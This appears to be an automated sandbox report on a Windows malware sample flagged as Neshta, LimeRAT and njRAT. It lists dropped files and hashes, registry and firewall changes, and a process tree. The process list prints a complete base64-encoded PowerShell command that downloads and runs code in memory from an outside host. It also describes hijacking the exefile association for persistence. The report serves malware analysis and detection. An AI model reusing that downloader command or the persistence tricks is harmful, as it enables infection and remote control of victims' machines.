SHA256 a300d69eb7c1105cf51ea4f6a36af24ee4a68aa9e1c75b7ca624cae7f3fdd40f
SHA512 1df37ea11ecfa33819431b8105d285bdd341ccdac79065896e007f2a853e82e2bdda3997c4044e015e88595c6698152e16713574fe1faad012b2f454c7182cf9

C:\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

memory/5112-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Data.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/4764-179-0x0000000000000000-mapping.dmp

memory/5112-185-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp

memory/4616-186-0x0000000006090000-0x00000000060D4000-memory.dmp

memory/4460-188-0x0000000007170000-0x000000000718A000-memory.dmp

memory/4460-187-0x00000000077B0000-0x0000000007E2A000-memory.dmp

memory/4248-189-0x0000000000000000-mapping.dmp

memory/4460-190-0x0000000007470000-0x00000000074E6000-memory.dmp

C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe

MD5 d8d83f120a94686c180a07add6fd7fae
SHA1 05570c7b2b50453a84ce71a32d6988813a8268be
SHA256 620795199d3d28dbe5849f30b2c2a3d56a5b81016b846ac9eab5c3323313edd3
SHA512 1f3e3bf1612a4868a7ad1b17dc96624e8152a55c317cc664f77dcde8c453ee407ca725ac04e09bd78232f99022d3310c6d727256395888196d61d25010c2791e

C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe

MD5 cce8964848413b49f18a44da9cb0a79b
SHA1 0b7452100d400acebb1c1887542f322a92cbd7ae
SHA256 fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5
SHA512 bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE

MD5 92dc0a5b61c98ac6ca3c9e09711e0a5d
SHA1 f809f50cfdfbc469561bced921d0bad343a0d7b4
SHA256 3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc
SHA512 d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31

C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE

MD5 3ad3461ef1d630f38ed3749838bbedc3
SHA1 8d85b0b392ae75c5d0b004ee9cf5a7b80b1b79e6
SHA256 32be2bca2b848da78c02140a288f1bb771cb66757f90d20126b1bcfd5bb40e62
SHA512 0e95e5181eab14d5820a3a4952018ac9b290fa3b17add8a5e13d893052f1d2a90a2323c62843f6a9e9af00f27e00108b60e0bce2f848e0a4d8ce0cce153db1ba

C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE

MD5 a6e53bba7581f77c0a0624b82caff875
SHA1 a53cce0d23e2cae98a15c67791cf573faecb7b94
SHA256 c8c9eebf6dadaa6d433bec14a9b9aa521b3b7ecdd74df542aa2cee9cd5f0725b
SHA512 8a1b5f6b47186611dcfc3ed8b84a76c4d0a099ae24bfdb906b128f1f288a92cacfaf36610579fe26743c2943615f89954bb23937f88e744c6af53eda74e8f92e

C:\PROGRA~2\Google\Update\DISABL~1.EXE

MD5 2a226fd810c5ce7b825ff7982bc22a0b
SHA1 58be5cb790336a8e751e91b1702a87fc0521a1d8
SHA256 af9e01dab96c2a54e2751a0d703cc55fdcc5ac00c40f0be2e13fd85c09b66132
SHA512 f122ce37b07871b88e322b0ca2e42f3170704d4165167d6d7b02883da9d2be5d2d62bdbd9f7e18d1c0c5e60e9e707a3b64ddb99150c99028333818dfa769deeb

C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE

MD5 22913149a9d766c415c21e613e4e1d1b
SHA1 36b33b1ab48615ebe7bd25472d50ba3de56a21c6
SHA256 495ac0a638059cb60b2eebf3ac5e8fd17d5fbc7424195308f19e2ffeac3e0ced
SHA512 d9e5396bb24e3ad7ba31b45e8e1bfeb74c32895ab3af6544715c5db04da0442fafd82b06c49a920d964cf0a8fac7a58ccef4a173f1a5879c6733748edc180b14

C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE

MD5 ad0efa1df844814c2e8ddc188cb0e3b5
SHA1 b1a8a09f2223aab8b8e3e9bc0e58cc83d402f8ab
SHA256 c87fd5b223cb6dc716815b442b4964d4670a30b5c79f4fb9f1c3a65ec9072e5a
SHA512 532cc173d9ef27098ff10b6b652c64231b4a14f99df3b5de2eb1423370c19590e2a6032023d3ed02e2080f2f087b620ebbbd079e4a47a584ef11f3eaa0eb8520

C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE

MD5 ae277ffe2e22ad48fe50d56172a234c5
SHA1 44034bf0485fa5819ac3229c4db152d2a22d7e2d
SHA256 5f4bf2ce22ce6fdcafbbd7fe7efab3720bcac37a20a838ac203b45fca2537173
SHA512 b72c93a99d63605931d712a08ffab83067af7f65df3848313a45679948facba94e779a3d01a0e4d57a54fc337662562034c3194a3702cfbb15b6e37866269a9e

C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe

MD5 7975e085c5990e5f6cce33801d3c1e74
SHA1 00ef175713841b92c214ffc01a7ce75b1283a78f
SHA256 746df41a73e931f422c88a3c65bf59a904f174d5899dfd16ef2841d7f05c1aa3
SHA512 857f503fbed30f414249e280117531341f8381326046672db333f1f39fd19e80ee4129447a5d2344ae5edd90b711e51f649a3c2924f844e57c11fffefb438c60

memory/1836-201-0x0000000000000000-mapping.dmp

C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE

MD5 73674d8ffd1478d2a201490bb8256531
SHA1 951e809b56c4a10be646c55bde6d20acf193db5b
SHA256 ee6da460a81786c5a7520e7320e82572ad62c3b052f4f606fc7c3150b01add61
SHA512 978b4bf8200ccca62200a951afe3e6256a5fa463bf9857ee57cf66d03a67a7c386aea6145800d8a046395bfc46452113caf02084785bb87cb9b9f6f27c7cc176

C:\Users\Admin\AppData\Roaming\Monitor.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

C:\Windows\directx.sys

MD5 3cff50701db04d976ef7487e1634ab3f
SHA1 ec4938af2581a594f399397240494e012f8e188f
SHA256 fa8938db5dffe579f591d590f31b7998b39a5eadfdde8be1fb18b409365a6b64
SHA512 a02e15f555b3ea906f5212ceea523108925accc322bdbe1540767cad9e02cd74096bbbb29fcb1140c7e158feac1fb058873b03f9fe19207e76c5a2f1728598af

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/2828-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 1a98c96379750e31022b6ee804f79fbb
SHA1 dc5224df726f8bf847b62bef2cd822c2c0b72b7f
SHA256 8dd25ed4b2ae1367264d8e861a82eedd1f9802376fdaf156a2b8d4ccb846fd13
SHA512 41677fcfee741fd0281ede2f694c4d79346c3d0c7aaa2ee6ba861a363730fe6767a501323aad593ca5e2198b7e2a1307d5c78dba9799181a23330f1319839b21

C:\Users\Admin\AppData\Roaming\Monitor.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

memory/1092-208-0x0000000000000000-mapping.dmp

memory/1092-210-0x00007FFAB78F0000-0x00007FFAB83B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\images.exe

MD5 7c671968b82daecfb05b738fa74bb02c
SHA1 4012dfb514490f5b1ee115e9d0c70a73d5a4b0e1
SHA256 20f4673b175fa07f785c92829353d875782c9c10dd0905d85513f0ff6193c48c
SHA512 c349707edc5cbfe92a8b741e8bbecad7e9a575030acb2613c16fe4431dc8dd62abe2265d53fe46ec7114c9a3d30599060615de2d50e4b09d6e7837265d91decf

C:\Users\Admin\AppData\Roaming\Sound.exe

MD5 022e5206b32c7916e540ef6ab66e1ed8
SHA1 a72131dd1820c06b406e7bd7f1d5b7f06224cfd5
SHA256 76848283ddd18ac087bdf88aa80f8117583d470e8cda06b8e7e69a49f62e54c4
SHA512 fe82efc82fdf89ee17ef8f5d50273d232bf43d6f0a3a6558b26c0682c1dc0834006cdd2b1f5be07fdb1224794da56c6d230a6668393b8995afabd39159472552

C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\VCREDI~1.EXE

MD5 07e194ce831b1846111eb6c8b176c86e
SHA1 b9c83ec3b0949cb661878fb1a8b43a073e15baf1
SHA256 d882f673ddf40a7ea6d89ce25e4ee55d94a5ef0b5403aa8d86656fd960d0e4ac
SHA512 55f9b6d3199aa60d836b6792ae55731236fb2a99c79ce8522e07e579c64eabb88fa413c02632deb87a361dd8490361aa1424beed2e01ba28be220f8c676a1bb5

C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE

MD5 87f15006aea3b4433e226882a56f188d
SHA1 e3ad6beb8229af62b0824151dbf546c0506d4f65
SHA256 8d0045c74270281c705009d49441167c8a51ac70b720f84ff941b39fad220919
SHA512 b01a8af6dc836044d2adc6828654fa7a187c3f7ffe2a4db4c73021be6d121f9c1c47b1643513c3f25c0e1b5123b8ce2dc78b2ca8ce638a09c2171f158762c7c1

C:\Users\ALLUSE~1\PACKAG~1\{61087~1\VCREDI~1.EXE

MD5 e2df3732ca93daaa5df4792582b9679b
SHA1 9b4e628fcaa2e279969bf293862ebe03d86ee0bb
SHA256 f1f928a9bef534c20a3ee922e25d7505ac132479b5f3c50ddf17ab919de70ad6
SHA512 780f9630984cd6cb91e27fbd4eb6c24bb03464b1d15643dbaed009c4d78b0359bc60f931bfbae098b3c845a00cb3be89a512b2c98250d2cc7adcf93cbf2f9221

C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\VC_RED~1.EXE

MD5 8819397a5eaf67562bc112865fcd2012
SHA1 8fe2cef160b7ffca85c03426c14b16e08021f9e0
SHA256 d05cec6f8c0b94a23a74cc9339980d78ec69d9febfc5d93374ca9e59fc7cc61f
SHA512 4707ca2899bf048dd1f19d39e74a5e04eef6ad90692b4dca9f88f10d4e37786756e2826cf2486eb489d2e6dbcf45e8608c447948827bc234e6a43843b0ff447e

C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\VC_RED~1.EXE

MD5 61fb43bb8a23ca0317d9c292e6b690e4
SHA1 b5fb6f3818d6c654d6e6f5c397f776b5d71154a2
SHA256 c23ecc0f946f8c7011b4acffc8c51889ac6a463a0bbf80f21d353e39390bad59
SHA512 d43eaf4f443a2404b3060510fd646352d0ae00b99bbfe2187afa0316b61fa0850b1cb4c6d5514573b779c7b574fbc706563407a3e272c50736fb2ad7c4c63772

C:\Users\ALLUSE~1\PACKAG~1\{33D1F~1\VCREDI~1.EXE

MD5 86749cd13537a694795be5d87ef7106d
SHA1 538030845680a8be8219618daee29e368dc1e06c
SHA256 8c35dcc975a5c7c687686a3970306452476d17a89787bc5bd3bf21b9de0d36a5
SHA512 7b6ae20515fb6b13701df422cbb0844d26c8a98087b2758427781f0bf11eb9ec5da029096e42960bf99ddd3d4f817db6e29ac172039110df6ea92547d331db4c

C:\Users\ALLUSE~1\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE

MD5 3a134f3ed216a0f5821df25379f70d58
SHA1 f78adaa21dc55b5faa85472796254b1ee15f46b8
SHA256 19c35d1bc1033db22bad439759444238ec4fb80def533df4b9204d151dfb6e67
SHA512 765084bd69991b2ea33c8a2492c5872cda51e07347813451b31b3533ffd26daf991b0d3cf5bdf579dbbee59eea7dfd2103cd0ffe4115542fe599b1485d22c0fd

C:\Users\ALLUSE~1\Adobe\Setup\{AC76B~1\setup.exe

MD5 dfacbd8fbcd719291963b9f70ea5f74d
SHA1 4fe106b6ceda9d57c2ae84d9eafaf8a69478f609
SHA256 498a3a90eba6f828d3e6248a80160a41a2c3bf0002f335db6f476a53c257dfe9
SHA512 0032212d9dd569a34d72096db846e6832dd4fbf4d4e001c2ffa9bbb7af635add2eafaafdf6a475c5c0d040cce11de57523aa7d783d3c0527b0297be5bfa4c0b6

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 9058cdb7b34c5de7f2fd7a3da24eb9e7
SHA1 7a8dfbe9243cfcf32047d56189b8bb9f923510e7
SHA256 c0b5e348c2583583d5a6c07a95e75b11d04fb37513b576e465f5d1411144a767
SHA512 db0da3bcb5e7ce5221294ff480bafebe786b203d2b20ef97802c217468cb0212b5e7e5766a8b50a053214af3371619743ad2dac7a20095648d482517d788bb2d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 40b81c4b88bffd6f0f746daba43c1abd
SHA1 85753f0a0e59ff55c3e49df99c07e30b924f2bd3
SHA256 6cb48e1a20c2eb4c18e158ae04c5ca8e85bee6c3d0fac32643b478ca99204370
SHA512 1fe1b326bf97a17ce808f8502ed0597dac186dfe5128505ee38ab4457cd643fd538e53dab76a5e2f5b7b7e7697e074ea488c06fb8b1cc6405e0d1a4e80b7897d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 93e6e19ed89d05b89f0166f04800295d
SHA1 132c05b6c599ed3f44d229c696fb3314cf274b78
SHA256 19c700422f16619af151c055a6f6536a2ea8c7afe2bc70997684dd4ac55e739d
SHA512 c14b18db6c0aececa28ba08c3a26756c68e6d497e6bc41a94a4fd493f1f9c813869cc446ac3c134997cbcd98004a2721cef8d4fbb28cb14051ab31cfa1d61de4

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-24 03:38

Reported

2022-05-24 03:42

Platform

win7-20220414-en

Max time kernel

21s

Max time network

178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

Signatures

Detect Neshta Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A

Neshta

persistence spyware neshta

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 904 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 904 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 904 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 904 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe
PID 1324 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1352 wrote to memory of 524 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 1352 wrote to memory of 524 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 1352 wrote to memory of 524 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 1352 wrote to memory of 524 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE
PID 1324 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\svchost.com
PID 1324 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 1324 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe C:\Windows\SysWOW64\WScript.exe
PID 108 wrote to memory of 1104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe
PID 108 wrote to memory of 1104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe
PID 108 wrote to memory of 1104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe
PID 108 wrote to memory of 1104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Roaming\images.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

"C:\Users\Admin\AppData\Local\Temp\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\images.exe"

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

C:\Users\Admin\AppData\Roaming\images.exe

C:\Users\Admin\AppData\Roaming\images.exe

C:\Users\Admin\AppData\Roaming\Sound.exe

C:\Users\Admin\AppData\Roaming\Sound.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\svcripts.vbs"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Sound.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\scripts.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\script.js"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA

C:\Windows\svchost.com

